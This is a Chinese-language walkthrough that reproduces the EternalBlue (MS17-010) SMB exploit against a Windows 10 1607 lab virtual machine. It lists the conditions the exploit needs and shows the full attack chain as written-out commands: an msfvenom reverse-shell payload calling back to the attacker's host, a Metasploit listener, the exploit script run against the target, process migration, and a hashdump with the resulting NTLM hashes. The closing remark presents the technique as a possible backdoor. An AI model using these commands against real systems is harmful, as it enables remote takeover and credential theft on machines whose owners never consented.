1. 背景介绍
永恒之蓝(ms17-010)通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
参考:https://www.freebuf.com/vuls/349281.html
本文有其他师傅的帮助,感谢各位师傅。
其实永恒之蓝这个漏洞影响的范围非常广,大致有以下类型:
Windows 2016 x64 Windows 10 Pro Vuild 10240 x64 Windows 2012 R2 x64 Windows 8.1 x64 Windows 2008 R2 SP1 x64 Windows 7 SP1 x64 Windows 2008 SP1 x64 Windows 2003 R2 SP2 x64 Windows XP SP2 x64 Windows 8.1 x86 Windows 7 SP1 x86 Windows 2008 SP1 x86 Windows 2003 SP2 x86 Windows XP SP3 x86 Windows 2000 SP4 x86
相关的cve有:CVE-2017-0145、CVE-2017-0146、CVE-2017-0147、CVE-2017-0148
基本上我们搜索永恒之蓝漏洞复现,99%的师傅选择的都是Windows7或者Windows server2008,因为这两个系统复现的成功了将近100%(在存在漏洞的情况下),复现的前提条件是:
- 关闭防火墙
- 关闭杀软(当然
win7和08本身不带有任何杀软) - 确认
445端口开放
但是在上述列表中,该漏洞甚至还影响Windows10、Windows server2016等,所以在这里复现的时候,查找了很多资料,只在YouTube上看到部分复现的视频,上面复现使用的是Windows server2016 standard Evaluation版本,后来我们尝试使用非常多的镜像版本去尝试复现:
其中有一个Windows10 pro英文版,其他师傅短暂复现成功过一次之后,其他均失败。
2. Windows10 1607版本漏洞复现
后来经过曾哥师傅的指点,在Windows10 1511和1607的版本上可能存在漏洞,并且他在1607版本上复现成功,经过整理发现,复现成功需要以下条件:
- 关闭
Windows defender - 禁止
Windows10更新 - 关闭防火墙
- 在本地计算机策略里面,修改本地策略的安全选项,设置可匿名访问的共享
- 使用老版本msf或者使用工具自己跑
2.1 msf新版
攻击机:mac10.30.1.214
靶机:Windows10虚拟机 1607版本192.168.135.28
当然啦,我们先按照新版本msf6和不关闭组策略的情况下进行测试,先安装了一个1607版本的镜像虚拟机:
ed2k://|file|cn_windows_10_multiple_editions_version_1607_updated_jul_2016_x64_dvd_9056935.iso|4347183104|35EA5DB0F3BB714F5CE0740FB89D82D1|/
先关闭其他的杂项,关闭Windows defender:
关闭防火墙等,不设置可匿名访问的共享,在这里查看ip和版本信息:
使用msf6来进行测试:
使用第一个进行测试,在这里面的第二个2023的那个,是老版本msf5里面的,是我自己加上去的,后续再说:
在这里发现,无论如何run,都会存在一个错误,这是网络连接错误,在这里就按照上面师傅的要求设置可匿名访问的共享,再跑:
在这里设置为\,保存之后再跑一下:
这次没有错误了,但是你无论如何run,会话就回不来,看下当前模块支持的系统类型:
当前是支持这里面的win10的,可能是系统不对的问题,如果使用老版的msf来执行的话,其实可以直接弹回来的,在这里借用橘子师傅的截图:
当然如果将msf5版本的模块直接放到msf6里面使用的话,会因为一些问题发生报错,可能是因为版本的问题:
2.2 工具版
攻击机:mac10.30.1.214靶机:Windows10虚拟机 1607版本 192.168.135.28
如果不使用msf的话,在这里参考以下师傅的文章,利用工具来进行复现,当然前提依旧是需要设置可匿名访问的共享:
https://blog.csdn.net/shuryuu/article/details/121159254
工具地址:
https://github.com/worawit/MS17-010
2.2.1 检测永恒之蓝漏洞
将github上工具下载到本地之后,先试用脚本检测下是否存在永恒之蓝漏洞,在这里使用Python2:
python checker.py 192.168.135.28
上图是正常的,如果是不正常的会显示:
当前如果再执行exp的话,会失败。
2.2.2 漏洞利用
首先生成一个exe,等会回弹到本地来:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.30.1.214 LPORT=7788 -f exe -o 7788.exe
另外一侧,打开msf,准备接收会话:
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 10.30.1.214 set lport 7788 run
打开刚下载的代码中的zzz_exploit.py文件,注释以下几行:
取消注释以下几行,并修改其中的文件:
在这里注意:第一个7788.exe是要和你的脚本在同一个文件夹下,如果不在的话,可以写其他的绝对路径,比如:/tmp/1.exe,如果永恒之蓝漏洞执行成功的话,就会将这个文件传到靶机的C盘下,文件名就是7788.exe。修改好之后,准备执行:
python zzz_exploit.py 192.168.135.28 netlogon(这个可以不带)
此时会话就弹回来了:
此时尝试抓取hash:
显示无法抓取,应该是进程问题,将进程由x86的迁移至x64的应该就可以了,查看下当前的进程:
meterpreter > hashdump [-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect. meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > getpid Current pid: 5616 meterpreter > ps
将当前的进程迁移至session为0,权限是system的x64的进程上来:
迁移到308上:
meterpreter > migrate 308 [*] Migrating from 5616 to 308... [*] Migration completed successfully. meterpreter > hashdump admin:1000:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634::: Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
再进行解密即可:
2.3 影响Windows10漏洞的因素
其实在上面2.2执行的时候,有些步骤配置了,但是依旧失败:
- 关闭
Windows defender - 禁止
Windows10更新 - 关闭防火墙
- 在本地计算机策略里面,修改本地策略的安全选项,设置可匿名访问的共享
但是在重启之后,就可以了,在这里经过测试发现,设置可匿名访问的共享是当前Windows10版本利用的必要条件。如果以上还不能成功,可以尝试开启3389,允许任何人访问。
并在本地安全策略中,关闭以下选项,重启之后再测试:
3. 总结
本次Windows10版本的永恒之蓝漏洞,理论上利用比较苛刻,需要手动配置,所以在实战中,基本上没有太大用处,但是不妨可以作为后门的一种。
